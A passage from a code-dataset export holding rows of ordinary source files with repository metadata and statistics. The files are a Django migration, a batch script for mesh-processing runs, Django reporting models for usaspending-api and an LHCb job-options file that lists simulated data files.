return cases,gris,caseObj,nbLignes,nbColonnes | 45.390266 | 233 | 0.612725 | 6,148 | 49,430 | 4.911516 | 0.072381 | 0.023182 | 0.059014 | 0.0408 | 0.914889 | 0.908465 | 0.902669 | 0.894224 | 0.892138 | 0.892138 | 0 | 0.027937 | 0.267894 | 49,430 | 1,089 | 234 | 45.390266 | 0.806289 | 0.213008 | 0 | 0.858136 | 0 | 0.002782 | 0.025862 | 0.000762 | 0 | 0 | 0 | 0 | 0 | 1 | 0.022253 | false | 0 | 0.009736 | 0.001391 | 0.197497 | 0.01669 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
0b04f46f0b0c4c3d79ec3395fb18c0488344f690 | 2,187 | py | Python | iaso/migrations/0092_auto_20210611_0951.py | BLSQ/iaso-copy | 85fb17f408c15e8c2d730416d1312f58f8db39b7 | [
"MIT"
] | 29 | 2020-12-26T07:22:19.000Z | 2022-03-07T13:40:09.000Z | iaso/migrations/0092_auto_20210611_0951.py | BLSQ/iaso-copy | 85fb17f408c15e8c2d730416d1312f58f8db39b7 | [
"MIT"
] | 150 | 2020-11-09T15:03:27.000Z | 2022-03-07T15:36:07.000Z | iaso/migrations/0092_auto_20210611_0951.py | BLSQ/iaso | 95c8087c0182bdd576598eb8cd39c440e58e15d7 | [
"MIT"
] | 4 | 2020-11-09T10:38:13.000Z | 2021-10-04T09:42:47.000Z | # Generated by Django 3.1.12 on 2021-06-11 09:51
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("iaso", "0091_merge_20210609_1748"),
]
operations = [
migrations.AlterField(
model_name="algorithmrun",
name="result",
field=models.JSONField(blank=True, null=True),
),
migrations.AlterField(
model_name="exportlog",
name="received",
field=models.JSONField(blank=True, null=True),
),
migrations.AlterField(
model_name="exportlog",
name="sent",
field=models.JSONField(blank=True, null=True),
),
migrations.AlterField(
model_name="exportrequest",
name="params",
field=models.JSONField(blank=True, null=True),
),
migrations.AlterField(
model_name="exportrequest",
name="result",
field=models.JSONField(blank=True, null=True),
),
migrations.AlterField(
model_name="form",
name="fields",
field=models.JSONField(blank=True, null=True),
),
migrations.AlterField(
model_name="formversion",
name="form_descriptor",
field=models.JSONField(blank=True, null=True),
),
migrations.AlterField(
model_name="instance",
name="json",
field=models.JSONField(blank=True, null=True),
),
migrations.AlterField(
model_name="mappingversion",
name="json",
field=models.JSONField(),
),
migrations.AlterField(
model_name="task",
name="params",
field=models.JSONField(blank=True, null=True),
),
migrations.AlterField(
model_name="task",
name="queue_answer",
field=models.JSONField(blank=True, null=True),
),
migrations.AlterField(
model_name="task",
name="result",
field=models.JSONField(blank=True, null=True),
),
]
| 29.554054 | 58 | 0.537266 | 195 | 2,187 | 5.938462 | 0.261538 | 0.207254 | 0.259067 | 0.300518 | 0.759931 | 0.728843 | 0.700345 | 0.700345 | 0.700345 | 0.663212 | 0 | 0.022253 | 0.342478 | 2,187 | 73 | 59 | 29.958904 | 0.783032 | 0.021033 | 0 | 0.731343 | 1 | 0 | 0.100982 | 0.01122 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.014925 | 0 | 0.059701 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
5007f26e4920ad62bbcc0afcfe911ccccee40d47 | 4,395 | py | Python | Projects/FEMShell/batch.py | ipc-sim/IDP | 235b04ce2be018df50ba4c84370b56631dce0a66 | [
"Apache-2.0"
] | 27 | 2021-11-10T04:02:53.000Z | 2022-03-25T07:00:02.000Z | Projects/FEMShell/batch.py | ipc-sim/IDP | 235b04ce2be018df50ba4c84370b56631dce0a66 | [
"Apache-2.0"
] | 1 | 2022-03-31T15:35:05.000Z | 2022-03-31T15:35:05.000Z | Projects/FEMShell/batch.py | ipc-sim/IDP | 235b04ce2be018df50ba4c84370b56631dce0a66 | [
"Apache-2.0"
] | 2 | 2021-12-19T07:14:28.000Z | 2022-03-11T02:55:57.000Z | import subprocess
# Intel MKL number of threads
numThreads = '16'
baseCommand += 'export MKL_NUM_THREADS=' + numThreads + '\nexport OMP_NUM_THREADS=' + numThreads + '\nexport VECLIB_MAXIMUM_THREADS=' + numThreads + '\n'
# run
for script in ['12-14_normal_flow.py']:
for meshName in ['cat']:
for smoothIntensity in ['0.5']:
for magnitude in ['5e-3']:
for frameNum in ['10']:
runCommand = baseCommand + 'python3 ' + script + ' ' + meshName + ' ' + smoothIntensity + ' ' + magnitude + ' ' + frameNum
if subprocess.call([runCommand], shell=True):
continue
for script in ['12-14_normal_flow.py']:
for meshName in ['hand']:
for smoothIntensity in ['0.5']:
for magnitude in ['5e-3']:
for frameNum in ['3']:
runCommand = baseCommand + 'python3 ' + script + ' ' + meshName + ' ' + smoothIntensity + ' ' + magnitude + ' ' + frameNum
if subprocess.call([runCommand], shell=True):
continue
for script in ['12-14_normal_flow.py']:
for meshName in ['walnut71K']:
for smoothIntensity in ['0.1']:
for magnitude in ['5e-3']:
for frameNum in ['8']:
runCommand = baseCommand + 'python3 ' + script + ' ' + meshName + ' ' + smoothIntensity + ' ' + magnitude + ' ' + frameNum
if subprocess.call([runCommand], shell=True):
continue
for script in ['12-14_normal_flow.py']:
for meshName in ['bunny3K']:
for smoothIntensity in ['0.5']:
for magnitude in ['-5e-3']:
for frameNum in ['50']:
runCommand = baseCommand + 'python3 ' + script + ' ' + meshName + ' ' + smoothIntensity + ' ' + magnitude + ' ' + frameNum
if subprocess.call([runCommand], shell=True):
continue
for script in ['12-14_normal_flow.py']:
for meshName in ['feline']:
for smoothIntensity in ['1']:
for magnitude in ['-5e-3']:
for frameNum in ['50']:
runCommand = baseCommand + 'python3 ' + script + ' ' + meshName + ' ' + smoothIntensity + ' ' + magnitude + ' ' + frameNum
if subprocess.call([runCommand], shell=True):
continue
for script in ['12-14_normal_flow.py']:
for meshName in ['font_Tao']:
for smoothIntensity in ['0.5']:
for magnitude in ['5e-3']:
for frameNum in ['10']:
runCommand = baseCommand + 'python3 ' + script + ' ' + meshName + ' ' + smoothIntensity + ' ' + magnitude + ' ' + frameNum
if subprocess.call([runCommand], shell=True):
continue
for script in ['12-14_normal_flow.py']:
for meshName in ['font_Peng']:
for smoothIntensity in ['0.5']:
for magnitude in ['5e-3']:
for frameNum in ['5']:
runCommand = baseCommand + 'python3 ' + script + ' ' + meshName + ' ' + smoothIntensity + ' ' + magnitude + ' ' + frameNum
if subprocess.call([runCommand], shell=True):
continue
for script in ['12-14_normal_flow.py']:
for meshName in ['font_delicious']:
for smoothIntensity in ['0.5']:
for magnitude in ['5e-3']:
for frameNum in ['12']:
runCommand = baseCommand + 'python3 ' + script + ' ' + meshName + ' ' + smoothIntensity + ' ' + magnitude + ' ' + frameNum
if subprocess.call([runCommand], shell=True):
continue
for script in ['12-14_normal_flow.py']:
for meshName in ['font_seriously']:
for smoothIntensity in ['10']:
for magnitude in ['5e-3']:
for frameNum in ['25']:
runCommand = baseCommand + 'python3 ' + script + ' ' + meshName + ' ' + smoothIntensity + ' ' + magnitude + ' ' + frameNum
if subprocess.call([runCommand], shell=True):
continue
for script in ['16_fix_char_seq.py']:
for seqName in ['Rumba_Dancing_unfixed', 'Kick_unfixed']:
runCommand = baseCommand + 'python3 ' + script + ' ' + seqName
if subprocess.call([runCommand], shell=True):
continue | 47.258065 | 153 | 0.526052 | 426 | 4,395 | 5.347418 | 0.150235 | 0.039508 | 0.048288 | 0.149254 | 0.83187 | 0.83187 | 0.83187 | 0.812994 | 0.799824 | 0.785777 | 0 | 0.035615 | 0.34198 | 4,395 | 93 | 154 | 47.258065 | 0.752075 | 0.007053 | 0 | 0.7125 | 0 | 0 | 0.133654 | 0.010087 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.0125 | 0 | 0.0125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
501d4d76324df6c9664c379fa8452c06cc143e74 | 2,957 | py | Python | usaspending_api/reporting/models.py | ststuck/usaspending-api | b13bd5bcba0369ff8512f61a34745626c3969391 | [
"CC0-1.0"
] | 217 | 2016-11-03T17:09:53.000Z | 2022-03-10T04:17:54.000Z | usaspending_api/reporting/models.py | ststuck/usaspending-api | b13bd5bcba0369ff8512f61a34745626c3969391 | [
"CC0-1.0"
] | 622 | 2016-09-02T19:18:23.000Z | 2022-03-29T17:11:01.000Z | usaspending_api/reporting/models.py | ststuck/usaspending-api | b13bd5bcba0369ff8512f61a34745626c3969391 | [
"CC0-1.0"
] | 93 | 2016-09-07T20:28:57.000Z | 2022-02-25T00:25:27.000Z | from django.db import models
class ReportingAgencyTas(models.Model):
"""
Model representing reporting data for appropriation and object class program activity values grouped by TAS and
period
"""
reporting_agency_tas_id = models.AutoField(primary_key=True)
toptier_code = models.TextField()
fiscal_year = models.IntegerField()
fiscal_period = models.IntegerField()
tas_rendering_label = models.TextField()
appropriation_obligated_amount = models.DecimalField(max_digits=23, decimal_places=2)
object_class_pa_obligated_amount = models.DecimalField(max_digits=23, decimal_places=2)
diff_approp_ocpa_obligated_amounts = models.DecimalField(max_digits=23, decimal_places=2)
class Meta:
db_table = "reporting_agency_tas"
indexes = [
models.Index(fields=["fiscal_year", "fiscal_period", "toptier_code"], name="reporting_agency_tas_group_idx")
]
class ReportingAgencyMissingTas(models.Model):
"""
Model representing missing reporting data for appropriation and object class program activity values grouped by TAS and
period
"""
reporting_agency_missing_tas_id = models.AutoField(primary_key=True)
toptier_code = models.TextField()
fiscal_year = models.IntegerField()
fiscal_period = models.IntegerField()
tas_rendering_label = models.TextField()
obligated_amount = models.DecimalField(max_digits=23, decimal_places=2)
class Meta:
db_table = "reporting_agency_missing_tas"
indexes = [
models.Index(fields=["fiscal_year", "fiscal_period", "toptier_code"], name="rpt_agency_missing_tas_grp_idx")
]
class ReportingAgencyOverview(models.Model):
"""
Model representing reporting data for appropriation and object class program activity values grouped by TAS and
period
"""
reporting_agency_overview_id = models.AutoField(primary_key=True)
toptier_code = models.TextField()
fiscal_year = models.IntegerField()
fiscal_period = models.IntegerField()
total_dollars_obligated_gtas = models.DecimalField(max_digits=23, decimal_places=2, null=True)
total_budgetary_resources = models.DecimalField(max_digits=23, decimal_places=2, null=True)
total_diff_approp_ocpa_obligated_amounts = models.DecimalField(max_digits=23, decimal_places=2, null=True)
unlinked_procurement_c_awards = models.IntegerField(null=True)
unlinked_assistance_c_awards = models.IntegerField(null=True)
unlinked_procurement_d_awards = models.IntegerField(null=True)
unlinked_assistance_d_awards = models.IntegerField(null=True)
linked_procurement_awards = models.IntegerField(null=True)
linked_assistance_awards = models.IntegerField(null=True)
class Meta:
db_table = "reporting_agency_overview"
indexes = [
models.Index(fields=["fiscal_year", "fiscal_period", "toptier_code"], name="reporting_agency_ovr_group_idx")
]
| 41.647887 | 123 | 0.751099 | 350 | 2,957 | 6.034286 | 0.222857 | 0.102273 | 0.069602 | 0.089489 | 0.840436 | 0.825284 | 0.773674 | 0.706439 | 0.706439 | 0.706439 | 0 | 0.008499 | 0.164356 | 2,957 | 70 | 124 | 42.242857 | 0.846216 | 0.123098 | 0 | 0.369565 | 0 | 0 | 0.106903 | 0.05641 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.021739 | 0 | 0.73913 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
acdb5824c9dffc547d63c5b49c7dccd2d582ef31 | 12,888 | py | Python | ksteta3pi/PotentialBackgrounds/MC_12_11134020_MagDown.py | Williams224/davinci-scripts | 730642d2ff13543eca4073a4ce0932631195de56 | [
"MIT"
] | null | null | null | ksteta3pi/PotentialBackgrounds/MC_12_11134020_MagDown.py | Williams224/davinci-scripts | 730642d2ff13543eca4073a4ce0932631195de56 | [
"MIT"
] | null | null | null | ksteta3pi/PotentialBackgrounds/MC_12_11134020_MagDown.py | Williams224/davinci-scripts | 730642d2ff13543eca4073a4ce0932631195de56 | [
"MIT"
] | null | null | null | #-- GAUDI jobOptions generated on Fri Jul 24 16:53:25 2015
#-- Contains event types :
#-- 11134020 - 119 files - 2018489 events - 438.56 GBytes
#-- Extra information about the data processing phases:
#-- Processing Pass Step-124834
#-- StepId : 124834
#-- StepName : Reco14a for MC
#-- ApplicationName : Brunel
#-- ApplicationVersion : v43r2p7
#-- OptionFiles : $APPCONFIGOPTS/Brunel/DataType-2012.py;$APPCONFIGOPTS/Brunel/MC-WithTruth.py;$APPCONFIGOPTS/Persistency/Compression-ZLIB-1.py
#-- DDDB : fromPreviousStep
#-- CONDDB : fromPreviousStep
#-- ExtraPackages : AppConfig.v3r164
#-- Visible : Y
#-- Processing Pass Step-124620
#-- StepId : 124620
#-- StepName : Digi13 with G4 dE/dx
#-- ApplicationName : Boole
#-- ApplicationVersion : v26r3
#-- OptionFiles : $APPCONFIGOPTS/Boole/Default.py;$APPCONFIGOPTS/Boole/DataType-2012.py;$APPCONFIGOPTS/Boole/Boole-SiG4EnergyDeposit.py;$APPCONFIGOPTS/Persistency/Compression-ZLIB-1.py
#-- DDDB : fromPreviousStep
#-- CONDDB : fromPreviousStep
#-- ExtraPackages : AppConfig.v3r164
#-- Visible : Y
#-- Processing Pass Step-124632
#-- StepId : 124632
#-- StepName : TCK-0x409f0045 Flagged for Sim08 2012
#-- ApplicationName : Moore
#-- ApplicationVersion : v14r8p1
#-- OptionFiles : $APPCONFIGOPTS/Moore/MooreSimProductionWithL0Emulation.py;$APPCONFIGOPTS/Conditions/TCK-0x409f0045.py;$APPCONFIGOPTS/Moore/DataType-2012.py;$APPCONFIGOPTS/L0/L0TCK-0x0045.py
#-- DDDB : fromPreviousStep
#-- CONDDB : fromPreviousStep
#-- ExtraPackages : AppConfig.v3r164
#-- Visible : Y
#-- Processing Pass Step-126434
#-- StepId : 126434
#-- StepName : Sim08e - 2012 - MD - Pythia8
#-- ApplicationName : Gauss
#-- ApplicationVersion : v45r7
#-- OptionFiles : $APPCONFIGOPTS/Gauss/Sim08-Beam4000GeV-md100-2012-nu2.5.py;$DECFILESROOT/options/@{eventType}.py;$LBPYTHIA8ROOT/options/Pythia8.py;$APPCONFIGOPTS/Gauss/G4PL_FTFP_BERT_EmNoCuts.py;$APPCONFIGOPTS/Persistency/Compression-ZLIB-1.py
#-- DDDB : dddb-20130929-1
#-- CONDDB : sim-20130522-1-vc-md100
#-- ExtraPackages : AppConfig.v3r193;DecFiles.v27r22
#-- Visible : Y
#-- Processing Pass Step-124630
#-- StepId : 124630
#-- StepName : Stripping20-NoPrescalingFlagged for Sim08
#-- ApplicationName : DaVinci
#-- ApplicationVersion : v32r2p1
#-- OptionFiles : $APPCONFIGOPTS/DaVinci/DV-Stripping20-Stripping-MC-NoPrescaling.py;$APPCONFIGOPTS/DaVinci/DataType-2012.py;$APPCONFIGOPTS/DaVinci/InputType-DST.py;$APPCONFIGOPTS/Persistency/Compression-ZLIB-1.py
#-- DDDB : fromPreviousStep
#-- CONDDB : fromPreviousStep
#-- ExtraPackages : AppConfig.v3r164
#-- Visible : Y
from Gaudi.Configuration import *
from GaudiConf import IOHelper
IOHelper('ROOT').inputFiles(['LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000001_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000002_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000003_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000004_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000005_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000006_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000007_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000008_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000009_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000010_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000011_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000012_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000013_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000014_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000015_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000016_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000017_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000018_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000019_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000020_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000021_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000022_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000023_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000024_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000025_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000026_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000027_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000028_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000029_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000030_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000031_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000032_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000033_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000034_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000035_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000036_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000037_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000038_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000039_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000040_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000041_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000042_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000043_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000044_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000045_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000046_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000047_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000048_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000049_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000050_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000051_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000052_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000053_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000054_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000055_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000056_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000057_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000058_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000059_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000060_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000061_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000062_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000063_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000064_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000065_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000066_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000067_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000068_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000069_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000070_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000071_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000072_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000073_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000074_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000075_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000076_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000077_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000078_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000079_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000080_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000081_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000082_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000083_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000084_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000085_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000086_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000087_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000088_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000089_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000090_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000091_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000092_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000093_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000094_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000095_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000096_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000097_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000098_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000099_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000100_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000101_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000102_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000103_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000104_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000105_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000106_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000107_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000108_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000109_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000110_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000111_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000112_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000113_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000114_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000115_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000116_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000117_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000118_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000119_1.allstreams.dst'
], clear=True)
